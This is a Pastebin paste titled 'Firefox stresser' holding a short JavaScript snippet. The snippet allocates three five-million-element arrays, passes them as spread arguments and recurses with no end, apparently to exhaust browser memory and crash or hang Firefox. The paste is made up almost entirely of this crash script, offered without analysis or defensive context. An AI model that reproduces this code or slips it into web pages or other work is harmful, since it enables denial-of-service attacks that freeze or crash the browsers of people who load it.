51L3N7

Firefox stresser

Dec 1st, 2015
187
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /**
  2.  * @author Roger Lima ([email protected])
  3.  * @date 19/apr/2014
  4.  */
  5.  
  6. ( function _() {
  7.     function __( ...$ ) {
  8.         return $;
  9.     }
  10.  
  11.     for ( var i = 0, c = [], d = [], e = []; i < 5e6; c[ i ] = d[ i ] = e[ i ] = i++ );
  12.  
  13.     __.call( this, c, d, e );
  14.     _();
  15.  
  16. }() );
Advertisement
Add Comment
Please, Sign In to add comment